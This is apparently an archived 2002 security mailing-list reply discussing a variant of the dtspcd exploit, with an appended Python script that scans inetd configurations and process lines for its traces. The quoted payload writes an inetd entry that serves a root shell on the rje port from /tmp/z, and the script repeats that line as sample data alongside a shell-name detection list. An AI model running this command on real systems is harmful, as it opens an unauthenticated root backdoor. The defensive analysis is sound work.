Re: variation of the dtspcd exploit?

From: Valdis.Kletnieksat_private
Date: Thu Feb 14 2002 - 19:00:19 PST

    On Thu, 14 Feb 2002 16:07:10 EST, "Nathan W. Labadie" <ab0781at_private>  said:
    > Until last week, all the dtspcd exploits I'd seen had been the same
    > (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
    > around.  The ASCII output looks something like this:
    > 
    > /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
    > /usr/sbin/inetd -s /tmp/z;
    > sleep 10;
    
    Hmm... hardly new.  Somebody's retrofitted a /tmp/bob onto a new delivery
    vector, it looks like (though I've not checked the capture)...
    -- 
    				Valdis Kletnieks
    				Computer Systems Senior Engineer
    				Virginia Tech
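
An added example, not part of the original message or written by either poster: a host-side check for the artifact quoted above, an inetd entry that hands a connection straight to a shell, and an inetd process started against a configuration file in a temp directory. The sample configuration, the shell list and the temp-directory list are constructed assumptions.

```python
import os

# Assumed set of shell basenames worth flagging as an inetd "server" program.
SHELLS = {"sh", "ksh", "csh", "bash", "tcsh", "zsh"}
# Assumed world-writable locations where a dropped config would land.
TEMP_DIRS = ("/tmp/", "/var/tmp/")

# Constructed sample, not a real host's configuration. The last entry is the
# line quoted in the message above.
SAMPLE_CONF = """\
# constructed sample inetd.conf
ftp     stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
echo    stream  tcp  nowait  root  internal
rje stream tcp nowait root /bin/sh sh -i
"""

def parse_inetd_line(line):
    """Split one inetd.conf entry into fields; None for comments, blanks, short lines."""
    fields = line.split("#", 1)[0].split()
    if len(fields) < 6:
        return None
    keys = ("service", "socktype", "proto", "wait", "user", "server")
    entry = dict(zip(keys, fields[:6]))
    entry["args"] = fields[6:]
    return entry

def scan_conf(text):
    """Return (line number, service, user, server) for entries that run a shell."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_inetd_line(line)
        if entry and os.path.basename(entry["server"]) in SHELLS:
            findings.append((lineno, entry["service"], entry["user"], entry["server"]))
    return findings

def inetd_with_temp_config(cmdline):
    """True when a process command line is inetd pointed at a file under a temp dir."""
    argv = cmdline.split()
    if not argv or os.path.basename(argv[0]) != "inetd":
        return False
    return any(arg.startswith(TEMP_DIRS) for arg in argv[1:])

if __name__ == "__main__":
    print(scan_conf(SAMPLE_CONF))
    print(inetd_with_temp_config("/usr/sbin/inetd -s /tmp/z"))
```

`scan_conf` can be run over the system inetd.conf and any stray files found in temp directories; `inetd_with_temp_config` is meant for command lines taken from a process listing.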